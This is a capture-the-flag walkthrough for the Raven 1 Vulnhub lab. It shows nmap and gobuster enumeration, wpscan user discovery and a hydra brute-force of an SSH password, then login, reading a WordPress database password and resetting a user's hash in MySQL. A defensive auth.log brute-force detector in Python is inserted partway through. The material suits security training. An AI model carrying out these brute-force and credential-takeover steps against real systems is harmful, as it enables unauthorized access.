Raven 1 Walkthrough
Target: Raven 1 (Vulnhub)
First, identify the target's IP address by scanning the local network that the Kali Linux machine sits on:
# nmap -sn 192.168.140.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 03:53 EDT
Nmap scan report for 192.168.140.1
Host is up (0.0017s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.140.2
Host is up (0.00030s latency).
MAC Address: 00:50:56:EC:B5:61 (VMware)
Nmap scan report for 192.168.140.153
Host is up (0.00063s latency).
MAC Address: 00:0C:29:DD:14:F1 (VMware)
Nmap scan report for 192.168.140.254
Host is up (0.00029s latency).
MAC Address: 00:50:56:E0:D4:6C (VMware)
Nmap scan report for 192.168.140.138
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.19 seconds
Then run a full scan against the target:
# nmap -sV -A -sC -p- 192.168.140.153
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 03:54 EDT
Nmap scan report for 192.168.140.153
Host is up (0.00061s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
|   2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
|   256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_  256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Raven Security
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33450/udp6  status
|   100024  1          37084/tcp6  status
|   100024  1          47978/tcp   status
|_  100024  1          49846/udp   status
47978/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:DD:14:F1 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms 192.168.140.153
The scan shows ports 22, 80, 111 and 47978 open. Port 80 deserves the attention here, so let's take a look at the website:
Although the home page has a Login link, clicking it does nothing; this appears to be a static page. Next, enumerate the site's directories with gobuster:
# gobuster dir --url http://192.168.140.153 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t20
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.140.153
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/04/07 04:02:17 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 316] [--> http://192.168.140.153/img/]
/css                  (Status: 301) [Size: 316] [--> http://192.168.140.153/css/]
/wordpress            (Status: 301) [Size: 322] [--> http://192.168.140.153/wordpress/]
/js                   (Status: 301) [Size: 315] [--> http://192.168.140.153/js/]
/manual               (Status: 301) [Size: 319] [--> http://192.168.140.153/manual/]
/vendor               (Status: 301) [Size: 319] [--> http://192.168.140.153/vendor/]
/fonts                (Status: 301) [Size: 318] [--> http://192.168.140.153/fonts/]
Progress: 33401 / 220561 (15.14%)
^C
[!] Keyboard interrupt detected, terminating.
A wordpress directory was found, and it can be accessed:
However, clicking the "hello world" post fails. This is because the hosts file does not resolve the site's domain name; adding an entry for it fixes that. Since this is WordPress, run wpscan to check for known weaknesses:
# wpscan --url http://192.168.140.153/wordpress --wp-content-dir -at -eu
_______________________________________________________________
         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://192.168.140.153/wordpress/ [192.168.140.153]
[+] Started: Thu Apr  7 04:13:10 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.140.153/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.140.153/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.140.153/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.19 identified (Latest, released on 2022-03-11).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.140.153/wordpress/, Match: '-release.min.js?ver=4.8.19'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.140.153/wordpress/, Match: 'WordPress 4.8.19'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] steven
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] michael
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Apr  7 04:13:14 2022
[+] Requests Done: 50
[+] Cached Requests: 5
[+] Data Sent: 13.244 KB
[+] Data Received: 344.136 KB
[+] Memory used: 138.039 MB
[+] Elapsed time: 00:00:04
The scan turned up two users: michael and steven. michael is very likely the administrator, so use michael as the username to brute-force the SSH password:
# hydra -l michael -P /usr/share/wordlists/rockyou.txt ssh://192.168.140.153
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-07 04:18:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.140.153:22/
[22][ssh] host: 192.168.140.153   login: michael   password: michael
1 of 1 target successfully completed, 1 valid password found
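Seen from the target's side, the hydra run above leaves a burst of "Failed password" lines in sshd's auth.log followed by an "Accepted password" from the same source. The following detector is an added example, not part of the original walkthrough: it flags a source once it produces 5 failures within 60 seconds (an assumed tuning) and raises a second, higher-severity alert if that source then logs in successfully. The log lines are constructed to mirror what this attack would leave on the Raven box.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Matches the two OpenSSH auth.log events this detection needs.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)

def parse(line, year=2022):
    # syslog timestamps carry no year, so the caller supplies one (assumed here)
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def detect(lines, threshold=5, window_s=60):
    # ('bruteforce', ip, user, n): `threshold` failures from ip inside `window_s`
    # ('compromise', ip, user, n): a login accepted from an already-flagged ip
    failures = defaultdict(deque)  # ip -> timestamps of recent failures
    flagged, alerts = set(), []
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        ts, result, user, ip = ev
        q = failures[ip]
        if result == "Failed":
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_s:
                q.popleft()  # drop failures that fell out of the sliding window
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("bruteforce", ip, user, len(q)))
        elif ip in flagged:
            alerts.append(("compromise", ip, user, len(q)))
    return alerts

SAMPLE_LOG = [  # constructed lines modelled on the hydra run against michael
    f"Apr  7 04:18:{28 + i:02d} Raven sshd[{2000 + i}]: Failed password for michael "
    f"from 192.168.140.138 port {50000 + i} ssh2" for i in range(6)
] + [
    "Apr  7 04:18:40 Raven sshd[2010]: Accepted password for michael "
    "from 192.168.140.138 port 50010 ssh2",
    "Apr  7 04:19:05 Raven sshd[2011]: Accepted password for steven "
    "from 192.168.140.1 port 40001 ssh2",  # normal login, must not alert
]
```

Run `detect(SAMPLE_LOG)` to see one bruteforce alert followed by one compromise alert for 192.168.140.138, and nothing for steven's login.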
Logging in over SSH with the cracked password yields one of the flags:
michael@Raven:~$ ls
michael@Raven:~$ pwd
/home/michael
michael@Raven:~$ cd /var/www/
michael@Raven:/var/www$ dir
flag2.txt  html
michael@Raven:/var/www$ cat flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
A MySQL service is found listening locally:
michael@Raven:/var/www$ netstat -tunlp
(No info could be read for "-p": geteuid()=1000 but you should be root.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:47978           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:587           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -
tcp6       0      0 :::111                  :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::37084                :::*                    LISTEN      -
udp        0      0 0.0.0.0:49846           0.0.0.0:*                           -
udp        0      0 0.0.0.0:37600           0.0.0.0:*                           -
udp        0      0 0.0.0.0:1006            0.0.0.0:*                           -
udp        0      0 127.0.0.1:1016          0.0.0.0:*                           -
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -
udp        0      0 0.0.0.0:111             0.0.0.0:*                           -
udp6       0      0 :::33450                :::*                                -
udp6       0      0 :::38065                :::*                                -
udp6       0      0 :::1006                 :::*                                -
udp6       0      0 :::111                  :::*                                -
The wordpress directory should therefore contain the username and password used to connect to the database; they are in the config.php file:
/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');
So try logging in to the MySQL server with them:
Then change michael's WordPress password:
mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass                          | user_nicename | user_email        | user_url | user_registered     | user_activation_key | user_status | display_name   |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
|  1 | michael    | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael       | michael@raven.org |          | 2018-08-12 22:49:12 |                     |           0 | michael        |
|  2 | steven     | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven        | steven@raven.org  |          | 2018-08-12 23:31:16 |                     |           0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)

mysql> update wp_users set user_pass=md5('password123') where id=1;
Query OK, 1 row affected (0.01 sec)
Rows matched: 1  Changed: 1  Warnings: 0
STRIVE FOR PROGRESS, NOT FOR PERFECTION